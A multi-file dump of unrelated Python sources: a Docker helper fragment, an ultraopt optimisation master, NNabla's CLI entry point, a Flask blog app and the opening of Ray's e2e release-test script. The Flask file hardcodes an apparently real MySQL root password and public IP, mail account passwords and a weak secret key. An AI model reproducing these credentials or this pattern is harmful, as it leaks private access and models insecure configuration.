yield source, line
if source == "stderr":
full_stderr += line
exit_code = process.wait()
if exit_code != 0:
raise DockerException(full_cmd, exit_code, stderr=full_stderr)
def format_dict_for_cli(dictionary: Dict[str, str], separator="="):
return [f"{key}{separator}{value}" for key, value in dictionary.items()]
def read_env_file(env_file: Path) -> Dict[str, str]:
result_dict = {}
for line in env_file.read_text().splitlines():
line = line.strip()
try:
first_sharp = line.index("#")
except ValueError:
pass
else:
line = line[:first_sharp]
if not line:
continue
line = line.strip()
key, value = line.split("=")
result_dict[key] = value
return result_dict
def read_env_files(env_files: List[Path]) -> Dict[str, str]:
result_dict = {}
for file in env_files:
result_dict.update(read_env_file(file))
return result_dict
|
master.py
|
import copy
import os
import threading
import time
from collections import defaultdict
from typing import Dict
import numpy as np
from ultraopt.facade.utils import get_wanted
from ultraopt.multi_fidelity.iter import WarmStartIteration
from ultraopt.multi_fidelity.iter_gen.base_gen import BaseIterGenerator
from ultraopt.optimizer.base_opt import BaseOptimizer
from ultraopt.utils.logging_ import get_logger
from ultraopt.utils.progress import no_progress_callback
from .dispatcher import Dispatcher
from ..result import Result
from ..utils.misc import print_incumbent_trajectory, dump_checkpoint
class Master(object):
def __init__(self,
run_id,
optimizer: BaseOptimizer,
iter_generator: BaseIterGenerator,
progress_callback=no_progress_callback,
checkpoint_file=None,
checkpoint_freq=10,
working_directory='.',
ping_interval=60,
time_left_for_this_task=np.inf,
nameserver='127.0.0.1',
nameserver_port=None,
host=None,
shutdown_workers=True,
job_queue_sizes=(-1, 0),
dynamic_queue_size=True,
result_logger=None,
previous_result=None,
incumbents: Dict[float, dict] = None,
incumbent_performances: Dict[float, float] = None
):
"""The Master class is responsible for the book keeping and to decide what to run next. Optimizers are
instantiations of Master, that handle the important steps of deciding what configurations to run on what
budget when.
Parameters
----------
run_id : string
A unique identifier of that Hyperband run. Use, for example, the cluster's JobID when running multiple
concurrent runs to separate them
optimizer: ultraopt.optimizer.base_opt.BaseOptimizer object
An object that can generate new configurations and registers results of executed runs
working_directory: string
The top level working directory accessible to all compute nodes(shared filesystem).
eta : float
In each iteration, a complete run of sequential halving is executed. In it,
after evaluating each configuration on the same subset size, only a fraction of
1/eta of them 'advances' to the next round.
Must be greater or equal to 2.
min_budget : float
The smallest budget to consider. Needs to be positive!
max_budget : float
the largest budget to consider. Needs to be larger than min_budget!
The budgets will be geometrically distributed :math:`\sim \eta^k` for
:math:`k\in [0, 1, ... , num\_subsets - 1]`.
ping_interval: int
number of seconds between pings to discover new nodes. Default is 60 seconds.
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
shutdown_workers: bool
flag to control whether the workers are shutdown after the computation is done
job_queue_size: tuple of ints
min and max size of the job queue. During the run, when the number of jobs in the queue
reaches the min value, it will be filled up to the max size. Default: (0,1)
dynamic_queue_size: bool
Whether or not to change the queue size based on the number of workers available.
If true (default), the job_queue_sizes are relative to the current number of workers.
logger: logging.logger like object
the logger to output some (more or less meaningful) information
result_logger:
a result logger that writes live results to disk
previous_result:
previous run to warmstart the run
"""
self.checkpoint_freq = checkpoint_freq
self.checkpoint_file = checkpoint_file
self.progress_callback = progress_callback
iter_generator.initialize(optimizer)
self.iter_generator = iter_generator
self.time_left_for_this_task = time_left_for_this_task
self.working_directory = working_directory
os.makedirs(self.working_directory, exist_ok=True)
self.logger = get_logger(self)
self.result_logger = result_logger
self.optimizer = optimizer
self.time_ref = None
self.iterations = []
self.jobs = []
self.num_running_jobs = 0
self.job_queue_sizes = job_queue_sizes
self.user_job_queue_sizes = job_queue_sizes
self.dynamic_queue_size = dynamic_queue_size
if job_queue_sizes[0] >= job_queue_sizes[1]:
raise ValueError("The queue size range needs to be (min, max) with min<max!")
if previous_result is None:
self.warmstart_iteration = []
else:
self.warmstart_iteration = [WarmStartIteration(previous_result, self.optimizer)]
# condition to synchronize the job_callback and the queue
self.thread_cond = threading.Condition()
self.config = {
'time_ref': self.time_ref
}
self.dispatcher = Dispatcher(
self.job_callback, queue_callback=self.adjust_queue_size,
run_id=run_id, ping_interval=ping_interval,
nameserver=nameserver, nameserver_port=nameserver_port,
host=host
)
self.incumbents = defaultdict(dict)
self.incumbent_performances = defaultdict(lambda: np.inf)
if incumbents is not None:
self.incumbents.update(incumbents)
if incumbent_performances is not None:
self.incumbent_performances.update(incumbent_performances)
self.dispatcher_thread = threading.Thread(target=self.dispatcher.run)
self.dispatcher_thread.start()
def shutdown(self, shutdown_workers=False):
self.logger.info('HBMASTER: shutdown initiated, shutdown_workers = %s' % (str(shutdown_workers)))
self.dispatcher.shutdown(shutdown_workers)
self.dispatcher_thread.join()
def wait_for_workers(self, min_n_workers=1):
"""
helper function to hold execution until some workers are active
Parameters
----------
min_n_workers: int
minimum number of workers present before the run starts
"""
self.logger.debug('wait_for_workers trying to get the condition')
with self.thread_cond:
while (self.dispatcher.number_of_workers() < min_n_workers):
self.logger.debug('HBMASTER: only %i worker(s) available, waiting for at least %i.' % (
self.dispatcher.number_of_workers(), min_n_workers))
self.thread_cond.wait(1)
self.dispatcher.trigger_discover_worker()
self.logger.debug('Enough workers to start this run!')
def get_next_iteration(self, iteration, iteration_kwargs):
"""
instantiates the next iteration
Overwrite this to change the multi_fidelity for different optimizers
Parameters
----------
iteration: int
the index of the iteration to be instantiated
iteration_kwargs: dict
additional kwargs for the iteration class
Returns
-------
HB_iteration: a valid HB iteration object
"""
return self.iter_generator.get_next_iteration(iteration, **iteration_kwargs)
def run(self, n_iterations=1, min_n_workers=1, iteration_kwargs={}, ):
"""
run n_iterations of RankReductionIteration
Parameters
----------
n_iterations: int
number of multi_fidelity to be performed in this run
min_n_workers: int
minimum number of workers before starting the run
"""
self.all_n_iterations = self.iter_generator.num_all_configs(n_iterations)
self.progress_bar = self.progress_callback(0, self.all_n_iterations)
self.iter_cnt = 0
self.wait_for_workers(min_n_workers)
iteration_kwargs.update({'result_logger': self.result_logger})
if self.time_ref is None:
self.time_ref = time.time()
self.config['time_ref'] = self.time_ref
self.logger.debug('HBMASTER: starting run at %s' % (str(self.time_ref)))
self.thread_cond.acquire()
start_time = time.time()
with self.progress_bar as self.progress_ctx:
while True:
self._queue_wait()
cost_time = time.time() - start_time
if cost_time > self.time_left_for_this_task:
self.logger.warning(f"cost_time = {cost_time:.2f}, "
f"exceed time_left_for_this_task = {self.time_left_for_this_task}")
break
next_run = None
# find a new run to schedule
for i in self.active_iterations(): # 对self.iterations的过滤
next_run = self.iterations[i].get_next_run()
if not next_run is None: break # 取出一个配置成功了,返回。
if not next_run is None:
self.logger.debug('HBMASTER: schedule new run for iteration %i' % i)
self._submit_job(*next_run)
continue
else:
if n_iterations > 0: # we might be able to start the next iteration
# multi_fidelity 对象其实是 type: List[RankReductionIteration]
self.iterations.append(self.get_next_iteration(len(self.iterations), iteration_kwargs))
n_iterations -= 1
continue
cost_time = time.time() - start_time
if cost_time > self.time_left_for_this_task:
self.logger.warning(f"cost_time = {cost_time:.2f}, "
f"exceed time_left_for_this_task = {self.time_left_for_this_task}")
break
# at this point there is no immediate run that can be scheduled,
# so wait for some job to finish if there are active multi_fidelity
if self.active_iterations():
self.thread_cond.wait()
else:
break
self.thread_cond.release()
for i in self.warmstart_iteration:
i.fix_timestamps(self.time_ref)
ws_data = [i.data for i in self.warmstart_iteration]
return Result([copy.deepcopy(i.data) for i in self.iterations] + ws_data, self.config)
def adjust_queue_size(self, number_of_workers=None):
self.logger.debug('HBMASTER: number of workers changed to %s' % str(number_of_workers))
with self.thread_cond:
self.logger.debug('adjust_queue_size: lock accquired')
if self.dynamic_queue_size:
nw = self.dispatcher.number_of_workers() if number_of_workers is None else number_of_workers
self.job_queue_sizes = (self.user_job_queue_sizes[0] + nw, self.user_job_queue_sizes[1] + nw)
self.logger.debug('HBMASTER: adjusted queue size to %s' % str(self.job_queue_sizes))
self.thread_cond.notify_all()
def job_callback(self, job):
"""
method to be called when a job has finished
this will do some book keeping and call the user defined
new_result_callback if one was specified
"""
self.logger.debug('job_callback for %s started' % str(job.id))
with self.thread_cond:
self.logger.debug('job_callback for %s got condition' % str(job.id))
self.num_running_jobs -= 1
if job.result is not None:
budget = job.kwargs["budget"]
challenger = job.kwargs["config"]
challenger_performance = job.result["loss"]
incumbent_performance = self.incumbent_performances[budget]
incumbent = self.incumbents[budget]
if challenger_performance < incumbent_performance:
if np.isfinite(self.incumbent_performances[budget]):
print_incumbent_trajectory(
challenger_performance, incumbent_performance,
challenger, incumbent, budget
)
self.incumbent_performances[budget] = challenger_performance
self.incumbents[budget] = challenger
if not self.result_logger is None:
self.result_logger(job)
self.iterations[job.id[0]].register_result(job)
self.optimizer.new_result(job)
# 更新进度条等操作
max_budget, best_loss, _ = get_wanted(self.optimizer)
self.progress_ctx.postfix = f"max budget: {max_budget}, best loss: {best_loss:.3f}"
self.progress_ctx.update(1)
self.iter_cnt += 1
if self.checkpoint_file is not None:
if (self.iter_cnt - 1) % self.checkpoint_freq == 0 or self.iter_cnt == self.all_n_iterations:
dump_checkpoint(self.optimizer, self.checkpoint_file)
if self.num_running_jobs <= self.job_queue_sizes[0]:
self.logger.debug("HBMASTER: Trying to run another job!")
self.thread_cond.notify()
self.logger.debug('job_callback for %s finished' % str(job.id))
def _queue_wait(self):
"""
helper function to wait for the queue to not overflow/underload it
"""
if self.num_running_jobs >= self.job_queue_sizes[1]:
while (self.num_running_jobs > self.job_queue_sizes[0]):
self.logger.debug('HBMASTER: running jobs: %i, queue sizes: %s -> wait' % (
self.num_running_jobs, str(self.job_queue_sizes)))
self.thread_cond.wait()
def _submit_job(self, config_id, config, config_info, budget):
"""
hidden function to submit a new job to the dispatcher
This function handles the actual submission in a
(hopefully) thread save way
"""
self.logger.debug('HBMASTER: trying submitting job %s to dispatcher' % str(config_id))
with self.thread_cond:
self.logger.debug('HBMASTER: submitting job %s to dispatcher' % str(config_id))
self.dispatcher.submit_job(config_id, config=config, config_info=config_info, budget=budget,
working_directory=self.working_directory)
self.num_running_jobs += 1
# shouldn't the next line be executed while holding the condition?
self.logger.debug("HBMASTER: job %s submitted to dispatcher" % str(config_id))
def active_iterations(self):
"""
function to find active (not marked as finished) multi_fidelity
Returns
-------
list: all active iteration objects (empty if there are none)
"""
l = list(filter(lambda idx: not self.iterations[idx].is_finished, range(len(self.iterations))))
return (l)
def __del__(self):
# todo: kill server
pass
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
from nnabla.logger import logger
def _nnabla_version():
import nnabla
import nnabla.utils.callback as callback
version_string = 'Version:{}, Build:{}'.format(nnabla.__version__,
nnabla.__build_number__)
callback_version_string = callback.get_callback_version()
if callback_version_string is not None:
version_string += ', Callback:{}'.format(callback_version_string)
return version_string
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.create_object_detection_dataset import add_create_object_detection_dataset_command
add_create_object_detection_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.func_info import add_function_info_command
add_function_info_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
from nnabla.utils.cli.draw_graph import add_draw_graph_command
add_draw_graph_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface ({})'.format(_nnabla_version()))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
sys.exit(-1)
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
logger.log(99, "ABORTED")
os.kill(os.getpid(), 9)
# comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
sys.exit(-1)
if __name__ == '__main__':
main()
|
Pan_blog.py
|
from flask import Flask,request,render_template,session,redirect,url_for,flash
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from flask_script import Shell,Manager
from datetime import datetime
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail,Message
import os
from threading import Thread
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "mysql+pymysql://root:guo3625202123@132.232.77.200:3306/Pan-blog?charset=utf8mb4"
app.config["SQLALCHEMY_COMMIT_ON_TEARDOWN"] = True
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
app.config['FLASKY_MAIL_PREFIX'] = '[平底锅]'
app.config['FLASKY_MAIL_SENDER'] = '平底锅 Admin'
app.config.update(
DEBUG = True,
MAIL_SERVER='smtp.126.com',
MAIL_PROT=25,
MAIL_USE_TLS = False,
MAIL_USE_SSL = False,
MAIL_USERNAME = 'follow_wind@126.com',
MAIL_PASSWORD = 'XG2tX5dEtxER',
# MAIL_PASSWORD = 'poippvcqweanbbcc' 763532119@qq.com
MAIL_DEBUG = True
)
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
app.config["SECRET_KEY"] = "12345678"
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
manager = Manager(app)
mail = Mail(app)
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell',Shell(make_shell_context))
def send_async_email(app,msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwards):
msg = Message(app.config['FLASKY_MAIL_PREFIX'] + subject,
sender='follow_wind@126.com', recipients=[to])
# sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwards )
msg.html = render_template(template + '.html', **kwards)
thr = Thread(target=send_async_email,args=[app,msg])
thr.start()
print('send_mail')
return thr
@app.route('/',methods=['GET','POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user=User.query.filter_by(username=form.name.data).first()
if user is None:
user=User(username=form.name.data)
db.session.add(user)
session['known']=False
send_email('follow_wind@126.com','New User','mail/new_user',user=user)
# if app.config['FLASKY_ADMIN']:
# send_email(app.config['FLASKY_ADMIN'], 'New User',
# 'mail/new_user', user=user)
else:
session['known']=True
# old_name = session.get('name')-
# if old_name is not None and old_name != form.name.data:
# flash('Looks like you have changed your name!')
session['name'] = form.name.data
form.name.data=''
return redirect(url_for('index'))
return render_template('index.html', form=form,name=session.get('name'),known=session.get('known',False),current_time=datetime.utcnow())
@app.route('/user/<name>')
def user( name):
return render_template('user.html', name= name)
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64),unique=True)
users = db.relationship('User', backref='role',lazy='dynamic')
def __repr__(self):
return '<Role %r>'% self.name
class User(db.Model):
__tablename__='users'
id = db.Column(db.Integer,primary_key=True)
username = db.Column(db.String(64),unique=True,index=True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' %self.username
if __name__ == '__main__':
manager.run()
|
e2e.py
|
"""
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built ones.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off with by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specified the maximum time in seconds that can be passed without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
GLOBAL_CONFIG = {
"ANYSCALE_USER": os.environ.get("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": os.environ.get("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": os.environ.get("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": os.environ.get(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # cld_4F7k8814aZzGG8TNUGPKnc
"ANYSCALE_PROJECT": os.environ.get("ANYSCALE_PROJECT", ""),
"RAY_VERSION": os.environ.get("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": os.environ.get("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": os.environ.get("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": os.environ.get("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": os.environ.get("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": os.environ.get("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": os.environ.get("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": os.environ.get(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": os.environ.get(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
REPORT_S = 30
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class ReleaseTestTimeoutError(RuntimeError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def _check_stop(stop_event: multiprocessing.Event):
if stop_event.is_set():
raise ReleaseTestTimeoutError("Process timed out.")
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "status",
"value": {
"stringValue": status
}
},
{
"name": "last_logs",
"value": {
"stringValue": logs
}
},
{
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
},
{
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
},
{
"name": "category",
"value": {
"stringValue": category
}
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.stop_session(session_id=session_id, stop_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
